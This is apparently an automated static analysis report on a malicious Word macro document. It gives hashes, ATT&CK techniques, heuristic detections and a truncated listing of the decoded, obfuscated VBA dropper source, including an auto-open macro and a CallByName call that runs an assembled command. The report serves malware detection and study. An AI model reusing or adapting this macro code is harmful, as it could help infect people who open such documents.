Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1a3a4c1e3f700508…

MALICIOUS

Office (OLE)

68.0 KB Created: 2018-05-29 17:55:00 Authoring application: Microsoft Office Word First seen: 2020-05-25
MD5: 58f835ab7d724de9cbd051f7660e516c SHA-1: 4ee4b4e56eb72b0372e2b39a9271813387382d07 SHA-256: 1a3a4c1e3f700508b7b6ee919de1ceb0d95204ae9202b4a7bd14c08c4c394916
282 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1140 Deobfuscate/Decode Files or Information

The sample is a malicious Office document containing VBA macros. The 'AutOOpen' macro is triggered upon opening, and it uses 'CreateObject' and 'CallByName' to execute code. The document body explicitly instructs the user to 'Enable editing' and 'Enable content', indicating a lure to bypass security. The VBA script appears to be obfuscated but contains calls that likely lead to downloading and executing a second-stage payload, potentially via PowerShell, and establishing persistence through a Run key. The ClamAV detection 'Doc.Dropper.Agent-6564663-0' further supports its role as a dropper.

Heuristics 9

  • ClamAV: Doc.Dropper.Agent-6564663-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6564663-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8633 bytes
SHA-256: e911048736175917cca1fac494f56351469833f43254e83b04d9cb2242178f21
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutOOpen()
avealahcaB = 84 - 28
avealahcaB = 75 + 30 * 1
theeyamt
avealahcaB = 84 - 28
avealahcaB = avealahcaB - 31 + 34 + 3
End Sub


Attribute VB_Name = "aota0616"
Function plathovc(avehsiahc, October1821)
avealahcaB = 84 - 28
avealahcaB = 75 + 30 * 1
avealahcaB = 84 - 28
avealahcaB = avealahcaB - 31 + 34 + 3
plathovc = moneyalpha(nosnebib.giannnisss) + avehsiahc + moneyalpha(VEHCIRTAP.grimmasa) + _
 October1821 + moneyalpha(nosnebib.ruptmanc + nosnebib.voin2007) + October1821
End Function

Function hotfriday()
hotfriday = vogonehcloK.chinesebao
End Function

Function rufexwob()
rufexwob = "lgcua/gEmaQRa[o[ilE.]/"
End Function

Sub civeshoc(Drake269)
honeywarez = "Run"
gantcirc = 0
glennboots = True
avealahcaB = 84 - 28
avealahcaB = 75 + 30 * 1
CallByName Drake269, honeywarez, VbMethod, nosnebib.besstirp, gantcirc, glennboots
avealahcaB = 84 - 28
avealahcaB = avealahcaB - 31 + 34 + 3
End Sub

Function calperf1()
avealahcaB = 84 - 28
avealahcaB = 75 + 30 * 1
calperf1 = surfabc1232.saptrotb
avealahcaB = 84 - 28
avealahcaB = avealahcaB - 31 + 34 + 3
End Function

Function straggling(unixbill)
avealahcaB = 84 - 28
avealahcaB = 75 + 30 * 1
straggling = moneyalpha(rufexwob + surfabc1232.bondgone) + unixbill + _
moneyalpha(surfabc1232.icqelvis) + unixbill + moneyalpha(vogonehcloK.cpvo2391)
avealahcaB = 84 - 28
avealahcaB = avealahcaB - 31 + 34 + 3
End Function

Function lumeyres()
avealahcaB = 84 - 28
avealahcaB = 75 + 30 * 1
If 1 = 2 Then
MsgBox "Hello"
End If
lumeyres = nosnebib.dreamcat
avealahcaB = 84 - 28
avealahcaB = avealahcaB - 31 + 34 + 3
End Function

Function lakers4321(onomonom, gyppi105, AVONIHCTEV, tigresnake)
avealahcaB = 84 - 28
avealahcaB = 75 + 30 * 1
If 1 = 2 Then
MsgBox "Hello"
End If
avealahcaB = 84 - 28
avealahcaB = avealahcaB - 31 + 34 + 3
nosnebib.besstirp = plathovc(onomonom, gyppi105) + igaymiirP(onomonom, AVONIHCTEV) + straggling(tigresnake)
End Function


Attribute VB_Name = "clysmgog"
Function jiadouu1()
jiadouu1 = vogonehcloK.runisala
End Function

Function tempenny(adamflash As String, nilanereP As Integer) As String
Dim golfhector As Integer
golfhector = 0
avealahcaB = 84 - 28
avealahcaB = 75 + 30 * 1
avealahcaB = 84 - 28
avealahcaB = avealahcaB - 31 + 34 + 3
For maurice301 = 1 To 90
If (HIKSVONIGOL(jiadouu1, maurice301) = adamflash) Then
   golfhector = maurice301
   avealahcaB = 84 - 28
avealahcaB = 75 + 30 * 1
avealahcaB = 84 - 28
avealahcaB = avealahcaB - 31 + 34 + 3
    Exit For
End If
Next maurice301
avealahcaB = 84 - 28
avealahcaB = 75 + 30 * 1
avealahcaB = 84 - 28
avealahcaB = avealahcaB - 31 + 34 + 3
golfhector = IIf(golfhector - nilanereP <= 0, 90 + golfhector - nilanereP, golfhector - nilanereP)
tempenny = HIKSVONIGOL(jiadouu1, golfhector)
End Function





Attribute VB_Name = "menonaes"
Function igaymiirP(safendbl, johnsnuffy)
avealahcaB = 84 - 28
avealahcaB = 75 + 30 * 1
igaymiirP = moneyalpha(VEHCIRTAP.voknespak) + johnsnuffy + moneyalpha(VEHCIRTAP.antoGolos4) + _
johnsnuffy + moneyalpha(VEHCIRTAP.arktaherok) + safendbl + _
moneyalpha(surfabc1232.ozofameh + dealtrid + surfabc1232.crookque) + safendbl + moneyalpha(surfabc1232.ozofameh)
avealahcaB = 84 - 28
avealahcaB = avealahcaB - 31 + 34 + 3
End Function

Function dealtrid()
dealtrid = "Q]h]a/sh]macal]mgEmaQRa[o[ilE.]/"
End Function

Function indianlo()
indianlo = deskjet7
End Function

Function deskjet7()
deskjet7 = moneyalpha(surfabc1232.daiserau)
End Function

Function FEBRUARY1786()
FEBRUARY1786 = nosnebib.wethbate
End Function


Attribute VB_Name = "nosnebib"
Attribute VB_Base = "0{3C42E643-BB3D-42D5-8EA4-1FE88B3FFDDE}{924002AB-064C-469B-BF5F-EBD201444C73}"
Attribute VB_GlobalNameSpace = False
Attribute V
... (truncated)